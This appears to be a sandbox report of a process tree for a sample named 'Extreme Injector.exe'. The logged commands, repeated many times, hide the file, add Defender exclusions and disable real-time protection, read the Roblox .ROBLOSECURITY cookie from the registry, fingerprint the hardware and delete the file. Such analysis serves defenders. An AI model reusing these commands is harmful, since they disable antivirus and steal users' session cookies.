        C:\Windows\system32\PING.EXE
        
        ping localhost
        55⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        52⤵
        Executes dropped EXE
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        51⤵
        Executes dropped EXE
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        50⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:5088
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        51⤵
        Views/modifies file attributes
        
        PID:2268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        51⤵
        
        PID:3392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        
        PID:1908
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        51⤵
        
        PID:1336
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        51⤵
        
        PID:2088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        51⤵
        
        PID:4100
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        51⤵
        Detects videocard installed
        
        PID:4508
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        51⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1136
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        52⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1656
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        49⤵
        Executes dropped EXE
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        48⤵
        Executes dropped EXE
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        47⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4076
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        48⤵
        Views/modifies file attributes
        
        PID:2208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        48⤵
        
        PID:3820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        
        PID:3772
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        48⤵
        
        PID:2404
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        48⤵
        
        PID:4400
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:3744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3664
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        48⤵
        Detects videocard installed
        
        PID:1196
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3376
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        49⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:112
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        46⤵
        Executes dropped EXE
        
        PID:3284
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        45⤵
        Executes dropped EXE
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        44⤵
        Executes dropped EXE
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        43⤵
        Executes dropped EXE
        
        PID:1100
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        42⤵
        Executes dropped EXE
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        41⤵
        Executes dropped EXE
        
        PID:468
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        40⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1384
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        41⤵
        Views/modifies file attributes
        
        PID:392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:3248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:3616
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        41⤵
        
        PID:5036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        41⤵
        
        PID:952
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:4228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3236
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        41⤵
        Detects videocard installed
        
        PID:4100
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2000
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:112
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        39⤵
        Executes dropped EXE
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        38⤵
        Executes dropped EXE
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        37⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1488
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        38⤵
        Views/modifies file attributes
        
        PID:2356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:1848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        38⤵
        
        PID:2924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        38⤵
        
        PID:4088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:4704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        38⤵
        
        PID:2968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        38⤵
        Detects videocard installed
        
        PID:468
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        38⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1740
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        36⤵
        Executes dropped EXE
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        35⤵
        Executes dropped EXE
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        34⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2912
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        35⤵
        Views/modifies file attributes
        
        PID:4320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:2464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        35⤵
        
        PID:2152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        35⤵
        
        PID:1476
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        35⤵
        
        PID:4276
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        35⤵
        Detects videocard installed
        
        PID:220
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        35⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3408
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        33⤵
        Executes dropped EXE
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        32⤵
        Executes dropped EXE
        
        PID:1896
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        31⤵
        Executes dropped EXE
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        30⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3220
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        31⤵
        Views/modifies file attributes
        
        PID:1640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        31⤵
        
        PID:4052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        31⤵
        
        PID:3376
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        31⤵
        
        PID:536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        31⤵
        
        PID:748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        31⤵
        
        PID:4024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1232
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        31⤵
        Detects videocard installed
        
        PID:3744
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        31⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1624
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:468
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        29⤵
        Executes dropped EXE
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        28⤵
        Executes dropped EXE
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        27⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3776
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        28⤵
        Views/modifies file attributes
        
        PID:1716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:3260
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        28⤵
        
        PID:1884
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        28⤵
        
        PID:5104
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:900
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        28⤵
        Detects videocard installed
        
        PID:3988
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:264
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        26⤵
        Executes dropped EXE
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        25⤵
        Executes dropped EXE
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        24⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3612
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        25⤵
        Views/modifies file attributes
        
        PID:2200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:2608
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        25⤵
        
        PID:1028
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        25⤵
        
        PID:3136
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:4024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        25⤵
        
        PID:764
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        25⤵
        Detects videocard installed
        
        PID:2816
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4380
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        23⤵
        Executes dropped EXE
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        22⤵
        Executes dropped EXE
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        21⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1724
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        22⤵
        Views/modifies file attributes
        
        PID:1172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:2404
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        22⤵
        
        PID:4656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        22⤵
        
        PID:4488
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        22⤵
        
        PID:5024
        
